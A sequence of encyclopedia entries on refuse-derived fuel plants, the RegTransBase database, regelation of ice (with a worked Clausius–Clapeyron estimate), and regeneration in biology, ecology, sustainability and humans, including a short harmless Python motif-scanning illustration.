During spring 2008, Bollnäs Ovanåkers Renhållnings AB (BORAB) in Sweden started its new waste-to-energy plant, where municipal solid waste as well as industrial waste is turned into refuse-derived fuel. The 70,000–80,000 tonnes of RDF produced per annum are used to power the nearby BFB plant, which provides the citizens of Bollnäs with electricity and district heating . [ 18 ] [ 19 ]
In late March 2017, Israel launched its own RDF plant at the Hiriya Recycling Park, which will take in about 1,500 tonnes of household waste per day (around half a million tonnes of waste each year), with an estimated production of 500 tonnes of RDF daily. [ 20 ] The plant is part of Israel's "diligent effort to improve and advance waste management in Israel." [ 21 ]
In October 2018, the UAE 's Ministry of Climate Change and Environment signed a concession agreement with Emirates RDF ( BESIX , Tech Group Eco Single Owner, Griffin Refineries) to develop and operate an RDF facility in the Emirate of Umm Al Quwain . The facility will receive 1,000 tons per day of household waste and convert the waste of 550,000 residents of the emirates of Ajman and Umm Al Quwain into RDF. The RDF will be used in cement factories to partially replace the traditional use of gas or coal. [ 22 ] | https://en.wikipedia.org/wiki/Refuse-derived_fuel |
RegTransBase is a database of regulatory interactions and transcription factor binding sites in prokaryotes . [ 1 ]
| https://en.wikipedia.org/wiki/RegTransBase |
Regelation is the phenomenon of ice melting under pressure and refreezing when the pressure is reduced. This can be demonstrated by looping a fine wire around a block of ice, with a heavy weight attached to it. The pressure exerted on the ice slowly melts it locally, permitting the wire to pass through the entire block. The wire's track refills as soon as the pressure is relieved, so the ice block remains intact even after the wire passes completely through. This experiment is possible for ice at −10 °C or cooler, and while essentially valid, the details of the process by which the wire passes through the ice are complex. [ 1 ] The phenomenon works best with wires of high thermal conductivity, such as copper, since the latent heat released by refreezing on the upper side needs to be transferred to the lower side to supply the latent heat of melting. In short, regelation is the phenomenon in which ice melts under applied pressure and re-freezes once the pressure is removed.
Regelation was discovered by Michael Faraday . It occurs only in substances, such as ice, that expand upon freezing, because the melting points of such substances decrease with increasing external pressure. The melting point of ice falls by 0.0072 °C for each additional atm of pressure applied. For example, a pressure of 500 atmospheres is needed for ice to melt at −4 °C. [ 2 ]
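The quoted slope can be checked with the Clausius–Clapeyron relation. A minimal worked estimate, using standard handbook values for the latent heat of fusion and the specific volumes of water and ice (supplied here for illustration, not taken from the cited sources), is d T / d P = T Δ v / L , {\displaystyle {\frac {dT}{dP}}={\frac {T\,\Delta v}{L}}={\frac {(273.15\ \mathrm {K} )\times (-9.05\times 10^{-5}\ \mathrm {m^{3}/kg} )}{3.34\times 10^{5}\ \mathrm {J/kg} }}\approx -7.4\times 10^{-8}\ \mathrm {K/Pa} \approx -0.0075\ \mathrm {K/atm} ,} where Δ v = v water − v ice is negative because ice is less dense than liquid water. This agrees with the quoted 0.0072 °C per atmosphere near 0 °C; the figure of roughly 500 atm for melting at −4 °C reflects the fact that the melting curve steepens away from 0 °C, so the initial linear slope slightly underestimates the depression at higher pressures.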
For a normal crystalline ice far below its melting point, there will be some relaxation of the atoms near the surface. Simulations of ice near to its melting point show that there is significant melting of the surface layers rather than a symmetric relaxation of atom positions. Nuclear magnetic resonance provided evidence for a liquid layer on the surface of ice. In 1998, using atomic force microscopy , Astrid Döppenschmidt and Hans-Jürgen Butt measured the thickness of the liquid-like layer on ice to be roughly 32 nm at −1 °C, and 11 nm at −10 °C. [ 3 ]
The surface melting can account for the following:
A glacier can exert a sufficient amount of pressure on its lower surface to lower the melting point of its ice. The melting of the ice at the glacier's base allows it to move from a higher elevation to a lower elevation. Liquid water may flow from the base of a glacier at lower elevations when the temperature of the air is above the freezing point of water.
At least one 1992 article suggests that ascribing ice skating to regelation is a misconception. [ 4 ] The difficulty of matching the (large) magnitude of the water-ice pressure-volume gradient above the triple point with the prevailing temperatures and pressures arises equally in the ice skating context and in the classic laboratory experiment of a copper wire, say 28 swg, cutting through a 10 cm ice block. The misconception is not that these observations fail to be regelation, but that regelation can be explained solely in terms of the magnitude of the p-V gradient above the triple point; there is much more going on. Regelation is empirical: it is a phenomenon, as Brownian motion was before, during, and arguably even after Einstein modelled it. It has been so widely observed and described that it is generally described in terms of pressure causing increased surface melting. The recognition of the phenomenon in all the mentioned contexts is not in doubt. Car tyres work in snow, even though there is some increased surface melting, because they have tread which allows the meltwater to be liberated.
Ice skating is often given as an example of regelation; however, the pressure required is much greater than the weight of a skater can supply. Additionally, regelation does not explain how one can skate on ice at temperatures below 0 °C. [ 5 ]
The compaction of snow and the making of snowballs is another example from old texts. Here, too, the pressure required is far greater than the pressure that can be applied by hand. A counter-example is that cars do not melt snow as they run over it. | https://en.wikipedia.org/wiki/Regelation |
Regeneration in biology is the process of renewal, restoration, and tissue growth that makes genomes , cells , organisms , and ecosystems resilient to natural fluctuations or events that cause disturbance or damage. [ 1 ] Every species is capable of regeneration, from bacteria to humans. [ 2 ] [ 3 ] [ 4 ] Regeneration can either be complete [ 5 ] where the new tissue is the same as the lost tissue, [ 5 ] or incomplete [ 6 ] after which the necrotic tissue becomes fibrotic . [ 6 ]
At its most elementary level, regeneration is mediated by the molecular processes of gene regulation and involves the cellular processes of cell proliferation , morphogenesis and cell differentiation . [ 7 ] [ 8 ] Regeneration in biology, however, mainly refers to the morphogenic processes that characterize the phenotypic plasticity of traits allowing multi-cellular organisms to repair and maintain the integrity of their physiological and morphological states. Above the genetic level, regeneration is fundamentally regulated by asexual cellular processes. [ 9 ] Regeneration is different from reproduction. For example, hydra perform regeneration but reproduce by budding .
The regenerative process occurs in two multi-step phases: the preparation phase and the redevelopment phase. [ 10 ] [ 11 ] Regeneration begins with an amputation, which triggers the first phase. Right after the amputation, migrating epidermal cells form a wound epithelium which thickens, through cell division, throughout the first phase to form a cap around the site of the wound. [ 10 ] The cells underneath this cap then begin to divide rapidly and form a cone-shaped end to the amputation known as a blastema. Included in the blastema are skin, muscle, and cartilage cells that de-differentiate and become similar to stem cells in that they can become multiple types of cells. These de-differentiated cells divide until enough cells are available, at which point they differentiate again and the shape of the blastema begins to flatten out. Cells re-differentiate into the roles they originally filled, meaning skin cells again become skin cells and muscle cells again become muscle. It is at this point that the second phase begins: the redevelopment of the limb. In this stage, genes signal the cells to differentiate and the various parts of the limb are developed. The end result is a limb that looks and operates identically to the one that was lost, usually without any visual indication that the limb is newly generated.
The hydra and the planarian flatworm have long served as model organisms for their highly adaptive regenerative capabilities. [ 12 ] Once wounded, their cells become activated and restore the organs back to their pre-existing state. [ 13 ] The Caudata ("urodeles"; salamanders and newts ), an order of tailed amphibians , is possibly the most adept vertebrate group at regeneration, given their capability of regenerating limbs, tails, jaws, eyes and a variety of internal structures. [ 2 ] The regeneration of organs is a common and widespread adaptive capability among metazoan creatures. [ 12 ] In a related context, some animals are able to reproduce asexually through fragmentation , budding, or fission . [ 9 ] A planarian parent, for example, will constrict, split in the middle, and each half generates a new end to form two clones of the original. [ 14 ]
Echinoderms (such as the sea star), crayfish, many reptiles, and amphibians exhibit remarkable examples of tissue regeneration. Autotomy , for example, serves a defensive function, as the animal detaches a limb or tail to avoid capture. After the limb or tail has been autotomized, cells move into action and the tissues will regenerate. [ 15 ] [ 16 ] [ 17 ] In some cases a shed limb can itself regenerate a new individual. [ 18 ] Limited regeneration of limbs occurs in most fishes and salamanders, and tail regeneration takes place in larval frogs and toads (but not adults). The whole limb of a salamander or a triton will grow repeatedly after amputation. Among reptiles, chelonians, crocodilians and snakes are unable to regenerate lost parts, but many (though not all) kinds of lizards, geckos and iguanas possess a high degree of regenerative capacity. Usually, it involves dropping a section of the tail and regenerating it as part of a defense mechanism: while the animal is escaping a predator, if the predator catches the tail, it will disconnect. [ 19 ]
Ecosystems can be regenerative. Following a disturbance, such as a fire or pest outbreak in a forest, pioneering species will occupy, compete for space, and establish themselves in the newly opened habitat. The new growth of seedlings and community assembly process is known as regeneration in ecology . [ 20 ] [ 21 ]
Pattern formation in the morphogenesis of an animal is regulated by genetic induction factors that put cells to work after damage has occurred. Neural cells, for example, express growth-associated proteins, such as GAP-43 , tubulin , actin , an array of novel neuropeptides , and cytokines that induce a cellular physiological response to regenerate from the damage. [ 22 ] Many of the genes that are involved in the original development of tissues are reinitialized during the regenerative process. Cells in the primordia of zebrafish fins, for example, express four genes from the homeobox msx family during development and regeneration. [ 23 ]
"Strategies include the rearrangement of pre-existing tissue, the use of adult somatic stem cells and the dedifferentiation and/or transdifferentiation of cells, and more than one mode can operate in different tissues of the same animal. [ 1 ] All these strategies result in the re-establishment of appropriate tissue polarity, structure and form." [ 24 ] : 873 During the developmental process, genes are activated that serve to modify the properties of cell as they differentiate into different tissues. Development and regeneration involves the coordination and organization of populations cells into a blastema , which is "a mound of stem cells from which regeneration begins". [ 25 ] Dedifferentiation of cells means that they lose their tissue-specific characteristics as tissues remodel during the regeneration process. This should not be confused with the transdifferentiation of cells which is when they lose their tissue-specific characteristics during the regeneration process, and then re-differentiate to a different kind of cell. [ 24 ]
Many arthropods can regenerate limbs and other appendages following either injury or autotomy . [ 26 ] Regeneration capacity is constrained by the developmental stage and ability to molt. [ citation needed ]
Crustaceans , which continually molt, can regenerate throughout their lifetimes. [ 27 ] While molting cycles are generally hormonally regulated, limb amputation induces premature molting. [ 26 ] [ 28 ]
Hemimetabolous insects such as crickets can regenerate limbs as nymphs, before their final molt. [ 29 ]
Holometabolous insects can regenerate appendages as larvae prior to the final molt and metamorphosis . Beetle larvae, for example, can regenerate amputated limbs. Fruit fly larvae do not have limbs but can regenerate their appendage primordia, imaginal discs . [ 30 ] In both systems, the regrowth of the new tissue delays pupation. [ 30 ] [ 31 ]
Mechanisms underlying appendage limb regeneration in insects and crustaceans are highly conserved. [ 32 ] During limb regeneration species in both taxa form a blastema that proliferates and grows to repattern the missing tissue. [ 33 ]
Arachnids , including scorpions, are known to regenerate their venom, although the content of the regenerated venom is different from the original venom during its regeneration, as the venom volume is replaced before the active proteins are all replenished. [ 34 ]
The fruit fly Drosophila melanogaster is a useful model organism to understand the molecular mechanisms that control regeneration, especially gut and germline regeneration. [ 30 ] In these tissues, resident stem cells continually renew lost cells. [ 30 ] The Hippo signaling pathway was discovered in flies and was found to be required for midgut regeneration. Later, this conserved signaling pathway was also found to be essential for regeneration of many mammalian tissues, including heart, liver, skin, lung, and intestine. [ 35 ]
Many annelids (segmented worms) are capable of regeneration. [ 36 ] For example, Chaetopterus variopedatus and Branchiomma nigromaculata can regenerate both anterior and posterior body parts after latitudinal bisection. [ 37 ] The relationship between somatic and germline stem cell regeneration has been studied at the molecular level in the annelid Capitella teleta . [ 38 ] Leeches , however, appear incapable of segmental regeneration. [ 39 ] Furthermore, their close relatives, the branchiobdellids , are also incapable of segmental regeneration. [ 39 ] [ 36 ] However, certain individuals, like the lumbriculids, can regenerate from only a few segments. [ 39 ] Segmental regeneration in these animals is epimorphic and occurs through blastema formation. [ 39 ] Segmental regeneration has been gained and lost during annelid evolution, as seen in oligochaetes , where head regeneration has been lost three separate times. [ 39 ]
Along with epimorphosis, some polychaetes like Sabella pavonina experience morphallactic regeneration. [ 39 ] [ 40 ] Morphallaxis involves the de-differentiation, transformation, and re-differentiation of cells to regenerate tissues. How prominent morphallactic regeneration is in oligochaetes is currently not well understood. Although relatively under-reported, it is possible that morphallaxis is a common mode of inter-segment regeneration in annelids. Following regeneration in L. variegatus , past posterior segments sometimes become anterior in the new body orientation, consistent with morphallaxis. [ citation needed ]
Following amputation, most annelids are capable of sealing their body via rapid muscular contraction. Constriction of body muscle can lead to infection prevention. In certain species, such as Limnodrilus , autolysis can be seen within hours after amputation in the ectoderm and mesoderm . Amputation is also thought to cause a large migration of cells to the injury site, and these form a wound plug.
Tissue regeneration is widespread among echinoderms and has been well documented in starfish (Asteroidea) , sea cucumbers (Holothuroidea) , and sea urchins (Echinoidea). Appendage regeneration in echinoderms has been studied since at least the 19th century. [ 41 ] In addition to appendages, some species can regenerate internal organs and parts of their central nervous system. [ 42 ] In response to injury starfish can autotomize damaged appendages. Autotomy is the self-amputation of a body part, usually an appendage. Depending on severity, starfish will then go through a four-week process where the appendage will be regenerated. [ 43 ] Some species must retain mouth cells to regenerate an appendage, due to the need for energy. [ 44 ] The first organs to regenerate, in all species documented to date, are associated with the digestive tract. Thus, most knowledge about visceral regeneration in holothurians concerns this system. [ 45 ]
Regeneration research using planarians began in the late 1800s and was popularized by T.H. Morgan at the beginning of the 20th century. [ 44 ] Alejandro Sanchez-Alvarado and Philip Newmark transformed planarians into a model genetic organism at the beginning of the 21st century to study the molecular mechanisms underlying regeneration in these animals. [ 46 ] Planarians exhibit an extraordinary ability to regenerate lost body parts. For example, a planarian split lengthwise or crosswise will regenerate into two separate individuals. In one experiment, T.H. Morgan found that a piece corresponding to 1/279th of a planarian [ 44 ] or a fragment with as few as 10,000 cells can successfully regenerate into a new worm within one to two weeks. [ 47 ] After amputation, stump cells form a blastema formed from neoblasts , pluripotent cells found throughout the planarian body. [ 48 ] New tissue grows from neoblasts, with neoblasts comprising between 20 and 30% of all planarian cells. [ 47 ] Recent work has confirmed that neoblasts are totipotent, since one single neoblast can regenerate an entire irradiated animal that has been rendered incapable of regeneration. [ 49 ] In order to prevent starvation, a planarian will use its own cells for energy; this phenomenon is known as de-growth. [ 13 ]
Limb regeneration in the axolotl and newt has been extensively studied and researched. Although researchers have developed genetically altered axolotls, live cell imaging remains difficult due to the large size of adult axolotls. To address this issue, they use small juvenile axolotls, focus on smaller amputations like digits, and reduce light distortion caused by refraction in water by using iodixanol, a substance that is safe for living cells and tissues. [ 50 ] The nineteenth-century studies of this subject are reviewed in Holland (2021). [ 51 ] Urodele amphibians, such as salamanders and newts, display the highest regenerative ability among tetrapods. [ 52 ] [ 51 ] As such, they can fully regenerate their limbs, tail, jaws, and retina via epimorphic regeneration, leading to functional replacement with new tissue. [ 53 ] Salamander limb regeneration occurs in two main steps. First, the local cells dedifferentiate at the wound site into progenitor cells to form a blastema . [ 54 ] Second, the blastemal cells undergo cell proliferation , patterning, cell differentiation and tissue growth, using genetic mechanisms similar to those deployed during embryonic development. [ 55 ] Ultimately, blastemal cells will generate all the cells for the new structure. [ 52 ]
After amputation, the epidermis migrates to cover the stump in 1–2 hours, forming a structure called the wound epithelium (WE). [ 56 ] Epidermal cells continue to migrate over the WE, resulting in a thickened, specialized signaling center called the apical epithelial cap (AEC). [ 57 ] Over the next several days there are changes in the underlying stump tissues that result in the formation of a blastema (a mass of dedifferentiated proliferating cells). As the blastema forms, pattern formation genes – such as HoxA and HoxD – are activated as they were when the limb was formed in the embryo . [ 58 ] [ 59 ] The positional identity of the distal tip of the limb (i.e. the autopod, which is the hand or foot) is formed first in the blastema. Intermediate positional identities between the stump and the distal tip are then filled in through a process called intercalation. [ 58 ] Motor neurons , muscle, and blood vessels grow with the regenerated limb and reestablish the connections that were present prior to amputation. The time that this entire process takes varies according to the age of the animal, ranging from about a month to around three months in the adult, after which the limb becomes fully functional. Researchers at the Australian Regenerative Medicine Institute at Monash University have published findings that when macrophages , which eat up material debris, [ 60 ] were removed, salamanders lost their ability to regenerate and formed scarred tissue instead. [ 61 ] The axolotl salamander Ambystoma mexicanum , an organism with exceptional limb regenerative capabilities, likely undergoes epigenetic alterations in its blastema cells that enhance expression of genes involved in limb regeneration. The axolotl has very little blood and an excess of epidermal cells. This allows the affected area to flourish with epidermal cells, and continued gene expression allows the area to regenerate to its natural state. [ 62 ]
Despite the historically small number of researchers studying limb regeneration, remarkable progress has been made recently in establishing the neotenous amphibian the axolotl ( Ambystoma mexicanum ) as a model genetic organism. This progress has been facilitated by advances in genomics , bioinformatics , and somatic cell transgenesis in other fields that have created the opportunity to investigate the mechanisms of important biological properties, such as limb regeneration, in the axolotl. [ 55 ] The Ambystoma Genetic Stock Center (AGSC) is a self-sustaining breeding colony of the axolotl supported by the National Science Foundation as a Living Stock Collection. Located at the University of Kentucky, the AGSC is dedicated to supplying genetically well-characterized axolotl embryos, larvae, and adults to laboratories throughout the United States and abroad. An NIH -funded NCRR grant has led to the establishment of the Ambystoma EST database, the Salamander Genome Project (SGP) that has led to the creation of the first amphibian gene map and several annotated molecular databases, and the creation of the research community web portal. [ 63 ] In 2022, a first spatiotemporal map revealed key insights about axolotl brain regeneration , also providing the interactive Axolotl Regenerative Telencephalon Interpretation via Spatiotemporal Transcriptomic Atlas . [ 64 ] [ 65 ]
Anurans (frogs) can only regenerate their limbs during embryonic development. [ 66 ] Reactive oxygen species (ROS) appear to be required for a regeneration response in the anuran larvae. [ 67 ] ROS production is essential to activate the Wnt signaling pathway, which has been associated with regeneration in other systems. [ 67 ]
Once the limb skeleton has developed in frogs, regeneration does not occur ( Xenopus can grow a cartilaginous spike after amputation). [ 66 ] The adult Xenopus laevis is used as a model organism for regenerative medicine . In 2022, a cocktail of drugs and hormones ( 1,4-DPCA , BDNF , growth hormone , resolvin D5, and retinoic acid ), in a single dose lasting 24 hours, was shown to trigger long-term leg regeneration in adult X. laevis . Instead of a single spike, a paddle-shaped growth is obtained at the end of the limb by 18 months. [ 68 ]
Hydra is a genus of freshwater polyp in the phylum Cnidaria with highly proliferative stem cells that give them the ability to regenerate their entire body. [ 69 ] Any fragment larger than a few hundred epithelial cells that is isolated from the body has the ability to regenerate into a smaller version of itself. [ 69 ] The high proportion of stem cells in the hydra supports its efficient regenerative ability. [ 70 ]
Regeneration among hydra occurs as foot regeneration arising from the basal part of the body, and head regeneration, arising from the apical region. [ 69 ] Regeneration tissues that are cut from the gastric region contain polarity, which allows them to distinguish between regenerating a head in the apical end and a foot in the basal end so that both regions are present in the newly regenerated organism. [ 69 ] Head regeneration requires complex reconstruction of the area, while foot regeneration is much simpler, similar to tissue repair. [ 71 ] In both foot and head regeneration, however, there are two distinct molecular cascades that occur once the tissue is wounded: early injury response and a subsequent, signal-driven pathway of the regenerating tissue that leads to cellular differentiation . [ 70 ] This early-injury response includes epithelial cell stretching for wound closure, the migration of interstitial progenitors towards the wound, cell death , phagocytosis of cell debris, and reconstruction of the extracellular matrix. [ 70 ]
Regeneration in hydra has been defined as morphallaxis, the process where regeneration results from remodeling of existing material without cellular proliferation. [ 72 ] [ 73 ] If a hydra is cut into two pieces, the remaining severed sections form two fully functional and independent hydra, approximately the same size as the two smaller severed sections. [ 69 ] This occurs through the exchange and rearrangement of soft tissues without the formation of new material. [ 70 ]
During Hydra head regeneration there are coordinated gene expression and chromatin regulation changes. [ 74 ] An enhancer is a short DNA sequence (50–1500 base pairs) that can be bound by transcription factors to increase the transcription of a particular gene . In the enhancer regions that are activated during head regeneration, a set of transcription factor motifs commonly occurs that appears to facilitate coordinated gene expression. [ 74 ]
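To make the idea of recurring transcription factor motifs concrete, the toy sketch below scans short enhancer-like sequences for an AP-1-like consensus. The motif, the sequences, and the exact-match approach are illustrative simplifications; real analyses of regeneration enhancers use position weight matrices and dedicated motif tools rather than string matching.

```python
# Toy scan for a transcription factor motif in enhancer-like sequences.
# Motif and sequences are hypothetical; real analyses use position weight
# matrices and dedicated tools, not exact string matching.
import re

MOTIF = re.compile(r"TGA[CG]TCA")   # AP-1-like consensus, used here as an example

enhancers = {
    "enh1": "ATTGACTCAGGCTTGACTCAT",   # made-up sequences
    "enh2": "CCCGGGAAATTTTGAGTCAGG",
}

for name, seq in enhancers.items():
    hits = [m.start() for m in MOTIF.finditer(seq)]
    print(f"{name}: {len(hits)} motif hit(s) at positions {hits}")
```

An enhancer set in which the same few motifs keep turning up, as reported for the head-regeneration enhancers above, is the signature of a shared set of transcription factors coordinating the response.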
Owing to a limited literature on the subject, birds are believed to have very limited regenerative abilities as adults. Some studies [ 75 ] on roosters have suggested that birds can adequately regenerate some parts of the limbs, and that, depending on the conditions in which regeneration takes place, such as the age of the animal, the inter-relationship of the injured tissue with other muscles, and the type of operation, this can involve complete regeneration of some musculoskeletal structures. Werber and Goldschmidt (1909) found that the goose and duck were capable of regenerating their beaks after partial amputation, [ 75 ] and Sidorova (1962) observed liver regeneration via hypertrophy in roosters. [ 76 ] Birds are also capable of regenerating the hair cells in their cochlea following noise damage or ototoxic drug damage. [ 77 ] Despite this evidence, contemporary studies suggest reparative regeneration in avian species is limited to periods during embryonic development. An array of molecular biology techniques have been successful in manipulating cellular pathways known to contribute to spontaneous regeneration in chick embryos. [ 78 ] For instance, removing a portion of the elbow joint in a chick embryo via window excision or slice excision and comparing joint-tissue-specific markers and cartilage markers showed that window excision allowed 10 out of 20 limbs to regenerate and to express joint genes similarly to a developing embryo. In contrast, slice excision did not allow the joint to regenerate, due to the fusion of the skeletal elements seen by an expression of cartilage markers. [ 79 ]
Similar to the physiological regeneration of hair in mammals, birds can regenerate their feathers in order to repair damaged feathers or to attract mates with their plumage. Typically, seasonal changes that are associated with breeding seasons will prompt a hormonal signal for birds to begin regenerating feathers. This has been experimentally induced using thyroid hormones in the Rhode Island Red Fowls. [ 80 ]
Mammals are capable of cellular and physiological regeneration, but have generally poor reparative regenerative ability across the group. [ 1 ] [ 27 ] Examples of physiological regeneration in mammals include epithelial renewal (e.g., skin and intestinal tract), red blood cell replacement, antler regeneration and hair cycling. [ 81 ] [ 82 ] Male deer lose their antlers annually between January and April and then regrow them through regeneration, an example of physiological regeneration. A deer antler is the only appendage of a mammal that can be regrown every year. [ 83 ] While reparative regeneration is a rare phenomenon in mammals, it does occur. A well-documented example is regeneration of the digit tip distal to the nail bed. [ 84 ] Reparative regeneration has also been observed in rabbits, pikas and African spiny mice. In 2012, researchers discovered that two species of African spiny mice , Acomys kempi and Acomys percivali , were capable of completely regenerating the autotomically released or otherwise damaged tissue. These species can regrow hair follicles, skin, sweat glands , fur and cartilage. [ 85 ] In addition to these two species, subsequent studies demonstrated that Acomys cahirinus could regenerate skin and excised tissue in the ear pinna. [ 86 ] [ 87 ]
Despite these examples, it is generally accepted that adult mammals have limited regenerative capacity compared to most vertebrate embryos/larvae, adult salamanders and fish. [ 88 ] But the regeneration therapy approach of Robert O. Becker , using electrical stimulation, has shown promising results for rats [ 89 ] and mammals in general. [ 90 ]
Some researchers have also claimed that the MRL mouse strain exhibits enhanced regenerative abilities. Work comparing the differential gene expression of scarless-healing MRL mice and a poorly-healing C57BL/6 mouse strain identified 36 genes that differentiate the healing process between MRL mice and other mice. [ 91 ] [ 92 ] Study of the regenerative process in these animals is aimed at discovering how to duplicate it in humans, for example through deactivation of the p21 gene. [ 93 ] [ 94 ] However, recent work has shown that MRL mice actually close small ear holes with scar tissue, rather than regeneration as originally claimed. [ 86 ]
MRL mice are not protected against myocardial infarction ; heart regeneration in adult mammals ( neocardiogenesis ) is limited, because heart muscle cells are nearly all terminally differentiated . MRL mice show the same amount of cardiac injury and scar formation as normal mice after a heart attack. [ 95 ] However, recent studies provide evidence that this may not always be the case, and that MRL mice can regenerate after heart damage. [ 96 ]
The regrowth of lost tissues or organs in the human body is being researched. Some tissues such as skin regrow quite readily; others have been thought to have little or no capacity for regeneration, but ongoing research suggests that there is some hope for a variety of tissues and organs. [ 1 ] [ 97 ] Human organs that have been regenerated include the bladder, vagina and the penis. [ 98 ]
Like all metazoans, humans are capable of physiological regeneration (i.e. the replacement of cells during homeostatic maintenance that does not necessitate injury). For example, the regeneration of red blood cells via erythropoiesis occurs through the maturation of erythrocytes from hematopoietic stem cells in the bone marrow, their subsequent circulation for around 90 days in the blood stream, and their eventual cell-death in the spleen. [ 99 ] Another example of physiological regeneration is the sloughing and rebuilding of a functional endometrium during each menstrual cycle in females in response to varying levels of circulating estrogen and progesterone. [ 100 ]
However, humans are limited in their capacity for reparative regeneration, which occurs in response to injury. One of the most studied regenerative responses in humans is the hypertrophy of the liver following liver injury. [ 101 ] [ 102 ] For example, the original mass of the liver is re-established in direct proportion to the amount of liver removed following partial hepatectomy, [ 103 ] which indicates that signals from the body regulate liver mass precisely, both positively and negatively, until the desired mass is reached. This response is considered cellular regeneration (a form of compensatory hypertrophy) where the function and mass of the liver is regenerated through the proliferation of existing mature hepatic cells (mainly hepatocytes ), but the exact morphology of the liver is not regained. [ 102 ] This process is driven by growth factor and cytokine regulated pathways. [ 101 ] The normal sequence of inflammation and regeneration does not function accurately in cancer. Specifically, cytokine stimulation of cells leads to expression of genes that change cellular functions and suppress the immune response. [ 104 ]
Adult neurogenesis is also a form of cellular regeneration. For example, hippocampal neuron renewal occurs in normal adult humans at an annual turnover rate of 1.75% of neurons. [ 105 ] Cardiac myocyte renewal has been found to occur in normal adult humans, [ 106 ] and at a higher rate in adults following acute heart injury such as infarction. [ 107 ] Even in adult myocardium following infarction, proliferation is only found in around 1% of myocytes around the area of injury, which is not enough to restore function of cardiac muscle . However, this may be an important target for regenerative medicine as it implies that regeneration of cardiomyocytes, and consequently of myocardium, can be induced.
Another example of reparative regeneration in humans is fingertip regeneration, which occurs after phalanx amputation distal to the nail bed (especially in children) [ 108 ] [ 109 ] and rib regeneration, which occurs following osteotomy for scoliosis treatment (though usually regeneration is only partial and may take up to one year). [ 110 ]
Yet another example of regeneration in humans is vas deferens regeneration, which occurs after a vasectomy and which results in vasectomy failure. [ 111 ]
The ability and degree of regeneration in reptiles differ among the various species (see [ 112 ] ), but the most notable and well-studied occurrence is tail regeneration in lizards . [ 113 ] [ 114 ] [ 115 ] In addition to lizards, regeneration has been observed in the tails and maxillary bone of crocodiles, and adult neurogenesis has also been noted. [ 113 ] [ 116 ] [ 117 ] Tail regeneration has never been observed in snakes (but see [ 112 ] ). Lizards possess the highest regenerative capacity as a group. [ 114 ] [ 115 ] [ 118 ] Following autotomous tail loss, epimorphic regeneration of a new tail proceeds through a blastema-mediated process that results in a functionally and morphologically similar structure. [ 113 ] [ 114 ]
It has been estimated that the average shark loses about 30,000 to 40,000 teeth in a lifetime. Leopard sharks routinely replace their teeth every 9–12 days and this is an example of physiological regeneration. This can occur because shark teeth are not attached to a bone, but instead are developed within a bony cavity. [ 75 ]
Rhodopsin regeneration has been studied in skates and rays. After complete photo-bleaching, rhodopsin can completely regenerate within 2 hours in the retina . [ 119 ]
White bamboo sharks can regenerate at least two-thirds of their liver, and this has been linked to three microRNAs: xtr-miR-125b, fru-miR-204, and hsa-miR-142-3p_R-. In one study, two-thirds of the liver was removed and within 24 hours more than half of the liver had undergone hypertrophy . [ 120 ]
Some sharks can regenerate scales and even skin following damage. Within two weeks of skin wounding, mucus is secreted into the wound and this initiates the healing process. One study showed that the majority of the wounded area was regenerated within 4 months, but the regenerated area also showed a high degree of variability. [ 121 ] | https://en.wikipedia.org/wiki/Regeneration_(biology) |
In ecology regeneration is the ability of an ecosystem – specifically, the environment and its living population – to renew and recover from damage. It is a kind of biological regeneration .
Regeneration refers to ecosystems replenishing what is being eaten, disturbed, or harvested. Regeneration's biggest driver is photosynthesis , which transforms solar energy and nutrients into plant biomass. Resilience to minor disturbances is one characteristic feature of healthy ecosystems. Following major (lethal) disturbances, such as a fire or pest outbreak in a forest, an immediate return to the previous dynamic equilibrium will not be possible. Instead, pioneering species will occupy, compete for space, and establish themselves in the newly opened habitat. The new growth of seedlings and the community assembly process is known as regeneration in ecology . [ 1 ] [ 2 ] As ecological succession sets in, a forest will slowly regenerate towards its former state within the succession ( climax or any intermediate stage), provided that all outer parameters (climate, soil fertility, availability of nutrients , animal migration paths, air pollution or the absence thereof, etc.) remain unchanged.
In certain regions like Australia , natural wildfire is a necessary condition for a cyclically stable ecosystem with cyclic regeneration.
While natural disturbances are usually fully compensated by the rules of ecological succession, human interference can significantly alter the regenerative homeostatic faculties of an ecosystem up to a degree that self-healing will not be possible. For regeneration to occur, active restoration must be attempted. | https://en.wikipedia.org/wiki/Regeneration_(ecology) |
Regeneration refers to rethinking and reinventing business models , supply chains , and lifestyles to sustain and improve the earth's natural environment and avoid the depletion of natural resources. [ 1 ] Regeneration includes widespread environmental practices such as reusing , recycling , restoring, and the use of renewable resources .
The modern environmental movement gained traction in the early 1970s following the United Nations Conference on the Human Environment , the first time multiple nations joined together to discuss the state of the world's environment. [ citation needed ]
The concept of a generation that includes people of all ages who share a common interest in the environment was first introduced by Dell Chairman and CEO Michael Dell on World Environment Day 2007. [ citation needed ] Many of the original theories of change came from writers, thinkers, and designers such as Wendell Berry , Buckminster Fuller , David Orr and Frank Lloyd Wright . These individuals saw a shift happening in humanity toward a rekindled connection with nature, and they inspired monumental changes in our approaches and perspectives on topics such as building community, our relationship with agriculture and architecture, and the disconnect between modern economics and a finite planet. [ citation needed ]
Thought leaders like Paul Hawken , Kate Raworth , Naomi Klein , David Suzuki , and Bill McKibben have modernized the discourse and given the environmental movement a new set of tools in the form of conscious capitalism and positive climate communication . [ citation needed ] | https://en.wikipedia.org/wiki/Regeneration_(sustainability) |
Regeneration in humans is the regrowth of lost tissues or organs in response to injury. This is in contrast to wound healing , or partial regeneration, which involves closing up the injury site with some gradation of scar tissue. Some tissues such as skin, the vas deferens , and large organs including the liver can regrow quite readily, while others have been thought to have little or no capacity for regeneration following an injury.
Numerous tissues and organs have been induced to regenerate. Bladders have been 3D-printed in the lab since 1999. Skin tissue can be regenerated in vivo or in vitro . Other organs and body parts that have been induced to regenerate include the penis, fat, the vagina, brain tissue, the thymus, and a scaled-down human heart. One goal of scientists is to induce full regeneration in more human organs.
There are various techniques that can induce regeneration. By 2016, four main techniques had been operationalized: regeneration by instrument; [ 1 ] regeneration by materials; [ 2 ] [ 3 ] regeneration by drugs; [ 4 ] [ 5 ] [ 6 ] and regeneration by in vitro 3D printing. [ 3 ]
